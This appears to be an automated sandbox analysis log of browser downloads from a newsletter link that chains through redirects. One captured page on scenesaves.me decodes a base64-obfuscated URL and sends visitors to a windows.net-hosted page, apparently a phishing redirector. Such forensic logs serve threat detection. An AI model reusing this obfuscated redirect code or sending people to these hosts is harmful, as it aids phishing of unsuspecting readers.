                                                                                                                                                                                                                                Preview:"use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);function g(p){Vt(l,o,c,g,f,"next",p)}function f(p){Vt(l,o,c,g,f,"throw",p)}g(void 0)})}}function U(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):U(e,r)}function Me(e,r,a){return r in e?Object.defineProperty(e,r,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[r]=a,e}function Fe(e){for(var r=1;r<arguments.length;r++){var a=arguments[r]!=null?arguments[r]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Me(e,c,a[c])})}return e}function Rr(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:PNG image data, 43 x 14, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):61
                                                                                                                                                                                                                                Entropy (8bit):4.068159130770306
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:yionv//thPl+xt/G7lCyxl/k4E08up:6v/lhPmu7gy7Tp
                                                                                                                                                                                                                                MD5:43114A0609C99A8D60C4CFBB6F45F8D2
                                                                                                                                                                                                                                SHA1:52493226F67A7630F1E2F21613837BFBB9A3A15A
                                                                                                                                                                                                                                SHA-256:F65A215E94C1BBAF2C745E7398AF792BFF24943FC03359D31E82C43C8C53C49B
                                                                                                                                                                                                                                SHA-512:2326CB913D72501BC4179169E9A41317214A49E6A4B5ECAC3C0073D53B3C8D2B87C1597724889C701E45375B02ACDE57848675394ECE02D0BC55F8BDF9AE0AA8
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8ccfd93368b41996/1727989089358/W6rJjyMCftFIYFr
                                                                                                                                                                                                                                Preview:.PNG........IHDR...+.........9^r.....IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:PNG image data, 38 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):61
                                                                                                                                                                                                                                Entropy (8bit):4.035372245524405
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:yionv//thPlhuPpgyxl/k4E08up:6v/lhPSxgy7Tp
                                                                                                                                                                                                                                MD5:CAA490CFF56EEC9AE4AF2B23102EB874
                                                                                                                                                                                                                                SHA1:9A6F64798CC211C75C6B988F0B23C429742AE99C
                                                                                                                                                                                                                                SHA-256:67FA7B8CBC8548EE39ED3B39BA0EC2222C874F125F28B49C6CDC7E09B89B2961
                                                                                                                                                                                                                                SHA-512:8A14BEF9ACFADB0E16C882D4A9E28032223245DD9717B4712B85C704319A5F602263377E41A709428C4F13AC2BA7753EFC13D00B6552B37728A7D7519DC733F7
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8ccfd7c5dee932f4/1727989031964/firzFkNJpTj_uwa
                                                                                                                                                                                                                                Preview:.PNG........IHDR...&...U.............IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                Entropy (8bit):4.180365114215879
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
                                                                                                                                                                                                                                MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
                                                                                                                                                                                                                                SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
                                                                                                                                                                                                                                SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
                                                                                                                                                                                                                                SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:{"code":1,"message":"Session ID unknown"}
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                Entropy (8bit):4.180365114215879
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
                                                                                                                                                                                                                                MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
                                                                                                                                                                                                                                SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
                                                                                                                                                                                                                                SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
                                                                                                                                                                                                                                SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:{"code":1,"message":"Session ID unknown"}
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:PNG image data, 42 x 93, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):61
                                                                                                                                                                                                                                Entropy (8bit):4.068159130770306
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:yionv//thPlIlhl/hAkxl/k4E08up:6v/lhPGz/hAk7Tp
                                                                                                                                                                                                                                MD5:117490ACD1FCB165BA8A000677E57A04
                                                                                                                                                                                                                                SHA1:C13D7EA83ED230F3F3C35581E5797C62AD5CEBCB
                                                                                                                                                                                                                                SHA-256:074A7A55FE8CC69A157CF953CE09AD97AC787779B2CF3C1908674A3859D13CF6
                                                                                                                                                                                                                                SHA-512:1CEE35FCD42D2A9F5A373CBE4C0027C57923764A02EC0A23FBAEB16E3A40EF69C1743E57472499DE82A428C4082EE6D8AEC0C1391FB49CB5BBECD7DE0B5F8471
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:.PNG........IHDR...*...].....\.cu....IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:PNG image data, 4 x 87, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):61
                                                                                                                                                                                                                                Entropy (8bit):4.002585360278503
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:yionv//thPlJotnlB/Hxl/k4E08up:6v/lhP8tl1H7Tp
                                                                                                                                                                                                                                MD5:DC7E30C272EB21F594C52C1F71CC7F1D
                                                                                                                                                                                                                                SHA1:499C11D07083417BB514D79C7AE28CD3A1C093CD
                                                                                                                                                                                                                                SHA-256:CD7719C40190AFE833E1940CB96EB872C608E5B697FEDC22575B29526C53E7D7
                                                                                                                                                                                                                                SHA-512:FC68FBD3BE5F353FEEF03EC1C7914953ECF39ED74C9228A883D9D19BCB424BA6840030AFD942CDFEB692BFC209FE0370452400209C22FAECC1078E45FF36A87A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8ccfd82849af42f2/1727989047469/vzp1BJPgElHZJvF
                                                                                                                                                                                                                                Preview:.PNG........IHDR.......W.......sp....IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:PNG image data, 92 x 99, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):61
                                                                                                                                                                                                                                Entropy (8bit):4.068159130770307
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:yionv//thPlzk0Dll8kxl/k4E08up:6v/lhP+078k7Tp
                                                                                                                                                                                                                                MD5:6BFF8E86FE997770EAE3F63BF537AB04
                                                                                                                                                                                                                                SHA1:BF901182D085B0485B20B50BEF0E6AACFF6B55F2
                                                                                                                                                                                                                                SHA-256:CC50CB5A5DECBDF3AB4EF4A38463E6A3E65E4BCB2B246F72B3401ABB5FE5F645
                                                                                                                                                                                                                                SHA-512:22ADB25B8D298781D332448C8685A6E11851B7308AA0BDBE98AAD542E5C7A9DAE1F8E068DB1896B6B22C6CB28C2EF441DB539A5D17AE4DE279637D09EF16900B
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:.PNG........IHDR...\...c........w....IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (7958), with no line terminators
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):7958
                                                                                                                                                                                                                                Entropy (8bit):5.7814728725909355
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:7iuayPxRTnWbtd0/NxPeQzGQeM1IRaf/5ouCtie7:4CRTnWJd0/Nx3P1IQpCtig
                                                                                                                                                                                                                                MD5:B2D98C7BDCBD65DBC17D2CB7E55F9444
                                                                                                                                                                                                                                SHA1:9EA576DF59AEED0D460EFA6AAC56BE63BCA2D4D3
                                                                                                                                                                                                                                SHA-256:6F0A6D8115206C8E964171612341D7351766E0E30CCDDE76E3467B3561AA875D
                                                                                                                                                                                                                                SHA-512:DD79BC8F3CC593A9AD74711B7595D72B54F2CFE32B3B913D2E047057494E0B59A10C5F874524D21AEC0BD05A9B6EADEB61C41C562EFE4BEAE90AA801CCB37633
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://scenesaves.me/cdn-cgi/challenge-platform/h/g/scripts/jsd/ec4b873d446c/main.js?
                                                                                                                                                                                                                                Preview:window._cf_chl_opt={cFPWv:'g'};~function(V,f,g,l,m,n,x,y){V=b,function(c,d,U,B,C){for(U=b,B=c();!![];)try{if(C=parseInt(U(507))/1+-parseInt(U(542))/2*(parseInt(U(559))/3)+parseInt(U(469))/4+-parseInt(U(494))/5*(-parseInt(U(537))/6)+-parseInt(U(495))/7+-parseInt(U(512))/8+parseInt(U(546))/9,C===d)break;else B.push(B.shift())}catch(D){B.push(B.shift())}}(a,419932),f=this||self,g=f[V(547)],l=function(a0,d,B,C){return a0=V,d=String[a0(527)],B={'h':function(D){return null==D?'':B.g(D,6,function(E,a1){return a1=b,a1(470)[a1(473)](E)})},'g':function(D,E,F,a2,G,H,I,J,K,L,M,N,O,P,Q,R,S,T){if(a2=a0,D==null)return'';for(H={},I={},J='',K=2,L=3,M=2,N=[],O=0,P=0,Q=0;Q<D[a2(551)];Q+=1)if(R=D[a2(473)](Q),Object[a2(544)][a2(557)][a2(548)](H,R)||(H[R]=L++,I[R]=!0),S=J+R,Object[a2(544)][a2(557)][a2(548)](H,S))J=S;else{if(Object[a2(544)][a2(557)][a2(548)](I,J)){if(256>J[a2(545)](0)){for(G=0;G<M;O<<=1,E-1==P?(P=0,N[a2(531)](F(O)),O=0):P++,G++);for(T=J[a2(545)](0),G=0;8>G;O=T&1|O<<1,E-1==P?(P=0,N[a2(531)](F
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                Entropy (8bit):4.180365114215879
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
                                                                                                                                                                                                                                MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
                                                                                                                                                                                                                                SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
                                                                                                                                                                                                                                SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
                                                                                                                                                                                                                                SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:{"code":1,"message":"Session ID unknown"}
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:HTML document, ASCII text, with very long lines (945), with CRLF line terminators
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):1541
                                                                                                                                                                                                                                Entropy (8bit):5.396593140550334
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:hPZCaA0v5cpqN4mMC/MMFGLnxbFGWFJgu1JJSa7oRW7aRWXCunouOvTMOKFId6JF:tdckN4JC/MsGLrGWpSTw2wptI8Id6j
                                                                                                                                                                                                                                MD5:5563951D1E7F638CB02E633948346C32
                                                                                                                                                                                                                                SHA1:4F6471D0BF0B4C6F80EF2877EB89631B33CAFD9E
                                                                                                                                                                                                                                SHA-256:C4EC6CC2512B3ABCFC22085B58F2527132F2F8496E7DC7794C79B031B34413CA
                                                                                                                                                                                                                                SHA-512:BBF84E30932BF220439D49E0CAB05856D3EA70F9E0687B7F48021C51722F6D161AC1DD597C956378888F6D5A5B5D140CD36A91ED8AE4C9046ED8F78375449FAE
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://scenesaves.me/?utm_source=lims-newsletter-dde1ae.beehiiv.com&utm_medium=newsletter&utm_campaign=sprint-team
                                                                                                                                                                                                                                Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>Redirecting...</title>.. <script type="text/javascript">.. .. const base64EncodedURL = 'aHR0cHM6Ly9xMGVkbnJlMmFkbjBlbjAwLnoxLndlYi5jb3JlLndpbmRvd3MubmV0L3EwZWRucmUyYWRuLmh0bWw=';.... // Decode the base64 string and redirect.. window.onload = function() {.. const decodedURL = atob(base64EncodedURL);.. window.location.href = decodedURL;.. };.. </script>..</head>..<body>.. <p>Redirecting, please wait...</p>..<script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ccfd79aee41159f',t:'MTcyNzk4OTAyMi4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendC
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:HTML document, ASCII text, with very long lines (321), with no line terminators
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):321
                                                                                                                                                                                                                                Entropy (8bit):5.0896564296830835
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6:haxU0H2rKRHX96TdzRHxhgR0zY2i21sasPrK5YWOzdGBFzR2p0MlC2E:hax0rKRHkhzRH/Un2i2GprK5YWOKFzj
                                                                                                                                                                                                                                MD5:9744F4CE35250D5E26DB55ABB2C316B2
                                                                                                                                                                                                                                SHA1:B6D06396EEBA6ACEC627C645B462C9D723DF92D6
                                                                                                                                                                                                                                SHA-256:6DFB65C04D2A536D611CA5F5A4B2C13E25070F88449EA6C3545495956524CFC4
                                                                                                                                                                                                                                SHA-512:19F128391BA64B6F15F911D4D9A11FCABFB4D6BA43DDD8F77E47C088D29EC4B2911BD63ECE384C12E4DC3F49149B07197257582EDE4778E09232F13DD3D3610F
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://q0ednre2adn0en00.z1.web.core.windows.net/favicon.ico
                                                                                                                                                                                                                                Preview:<!DOCTYPE html><html><head><title>WebContentNotFound</title></head><body><h1>The requested content does not exist.</h1><p><ul><li>HttpStatusCode: 404</li><li>ErrorCode: WebContentNotFound</li><li>RequestId : aae6c9a8-501e-006a-5fd6-157fb9000000</li><li>TimeStamp : 2024-10-03T20:57:05.5042089Z</li></ul></p></body></html>
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                Entropy (8bit):4.180365114215879
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
                                                                                                                                                                                                                                MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
                                                                                                                                                                                                                                SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
                                                                                                                                                                                                                                SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
                                                                                                                                                                                                                                SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:{"code":1,"message":"Session ID unknown"}
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                Entropy (8bit):4.180365114215879
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
                                                                                                                                                                                                                                MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
                                                                                                                                                                                                                                SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
                                                                                                                                                                                                                                SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
                                                                                                                                                                                                                                SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:{"code":1,"message":"Session ID unknown"}
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:PNG image data, 92 x 99, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):61
                                                                                                                                                                                                                                Entropy (8bit):4.068159130770307
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:yionv//thPlzk0Dll8kxl/k4E08up:6v/lhP+078k7Tp
                                                                                                                                                                                                                                MD5:6BFF8E86FE997770EAE3F63BF537AB04
                                                                                                                                                                                                                                SHA1:BF901182D085B0485B20B50BEF0E6AACFF6B55F2
                                                                                                                                                                                                                                SHA-256:CC50CB5A5DECBDF3AB4EF4A38463E6A3E65E4BCB2B246F72B3401ABB5FE5F645
                                                                                                                                                                                                                                SHA-512:22ADB25B8D298781D332448C8685A6E11851B7308AA0BDBE98AAD542E5C7A9DAE1F8E068DB1896B6B22C6CB28C2EF441DB539A5D17AE4DE279637D09EF16900B
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8ccfd84d0859428f/1727989054308/PhU9i5DT5iFvgSb
                                                                                                                                                                                                                                Preview:.PNG........IHDR...\...c........w....IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:PNG image data, 91 x 86, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):61
                                                                                                                                                                                                                                Entropy (8bit):4.068159130770307
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:yionv//thPlupt/QvYll1xl/k4E08up:6v/lhP+4vY7Tp
                                                                                                                                                                                                                                MD5:8664326F8002998E4CC1667078ED6E8B
                                                                                                                                                                                                                                SHA1:E2E07BBEFBA41B054B8742ED9318C04C90E2ABCA
                                                                                                                                                                                                                                SHA-256:7205C397B0CE3D0998E0825F3149DEFB4115365E9B2E8792F4BC6B772A3D7D8B
                                                                                                                                                                                                                                SHA-512:739BB76E6EECE06C9ED8C0C705FAC9137F77F6078A6055E196230C8DFC6009AD8D9D2A1E29D26BD3E9C8633905C49C28E92E43BA62A87D8F7F432F5A494F8782
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8ccfd94f6c630fa5/1727989094429/tXap5lw161HPEn9
                                                                                                                                                                                                                                Preview:.PNG........IHDR...[...V...../.}.....IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                Entropy (8bit):4.180365114215879
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
                                                                                                                                                                                                                                MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
                                                                                                                                                                                                                                SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
                                                                                                                                                                                                                                SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
                                                                                                                                                                                                                                SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:{"code":1,"message":"Session ID unknown"}
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                Entropy (8bit):4.180365114215879
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
                                                                                                                                                                                                                                MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
                                                                                                                                                                                                                                SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
                                                                                                                                                                                                                                SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
                                                                                                                                                                                                                                SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:{"code":1,"message":"Session ID unknown"}
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:HTML document, ASCII text, with very long lines (513), with no line terminators
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):513
                                                                                                                                                                                                                                Entropy (8bit):4.836703911455829
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:fc3MxxeBAlQ0mHbm0RhBAlQ0mH01PXK+XVVBAlNpmHXb:fc3MxxeNbBRhN011VVFXb
                                                                                                                                                                                                                                MD5:BF813CFCBA19C3328F80E048C1F1838F
                                                                                                                                                                                                                                SHA1:17CDB6D2E0573F7F73E9ED60E6B397F6DBDAA807
                                                                                                                                                                                                                                SHA-256:7621B6F313F7C44B2377B69AD3552179DE41F44623F8DBDA513BD110B4A04CC2
                                                                                                                                                                                                                                SHA-512:74917C2D4F22CD6E6DAB2875C0F8605553289063E26D21552C913A6C5C447ED56AEC250F5AD4B7A463F23931B0C5CD516A5664285027F86B5D78AAA7167CC78A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://link.sbstck.com/redirect/6ef1e280-e65f-47a0-9173-11a97a4a3735?j=eyJ1IjoiNGI2N3k1In0.P8kfPr3fJr2h_Bk3DPLIxDv-gb9UenFUu61QzASc6Nw&utm_source=lims-newsletter-dde1ae.beehiiv.com&utm_medium=newsletter&utm_campaign=sprint-team
                                                                                                                                                                                                                                Preview:<head><noscript><META http-equiv="refresh" content="0;URL=https://scenesaves.me/?utm_source=lims-newsletter-dde1ae.beehiiv.com&#38;utm_medium=newsletter&#38;utm_campaign=sprint-team"></noscript><title>https://scenesaves.me/?utm_source=lims-newsletter-dde1ae.beehiiv.com&#38;utm_medium=newsletter&#38;utm_campaign=sprint-team</title></head><script>window.opener = null; location.replace("https://scenesaves.me/?utm_source=lims-newsletter-dde1ae.beehiiv.com&utm_medium=newsletter&utm_campaign=sprint-team")</script>
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                Entropy (8bit):4.180365114215879
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
                                                                                                                                                                                                                                MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
                                                                                                                                                                                                                                SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
                                                                                                                                                                                                                                SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
                                                                                                                                                                                                                                SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:{"code":1,"message":"Session ID unknown"}
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:PNG image data, 72 x 23, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):61
                                                                                                                                                                                                                                Entropy (8bit):4.035372245524405
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:yionv//thPlg/btxl/k4E08up:6v/lhPot7Tp
                                                                                                                                                                                                                                MD5:6660C25832A97C118EC86A4BD0F176AE
                                                                                                                                                                                                                                SHA1:8481EFBCEE0DF3BDE6F35154F68E83A176043E75
                                                                                                                                                                                                                                SHA-256:BBAC482123E92936D930CC415ED47645795AE01B71B963F7772F5671343C8960
                                                                                                                                                                                                                                SHA-512:758176E2EF4750B44FB95AD529B17459EA9C5A87963615ED0B72E7DA316C92264B7B0672E084DCBA1515306D4C83A25959D64735AB7C46DE4CD66A9723E7FB1C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8ccfd805a9cd425d/1727989041725/ojbtsX4PF9lVuS1
                                                                                                                                                                                                                                Preview:.PNG........IHDR...H.........'W.2....IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:PNG image data, 59 x 82, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):61
                                                                                                                                                                                                                                Entropy (8bit):4.002585360278503
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:yionv//thPlKltrtKkxl/k4E08up:6v/lhPsYk7Tp
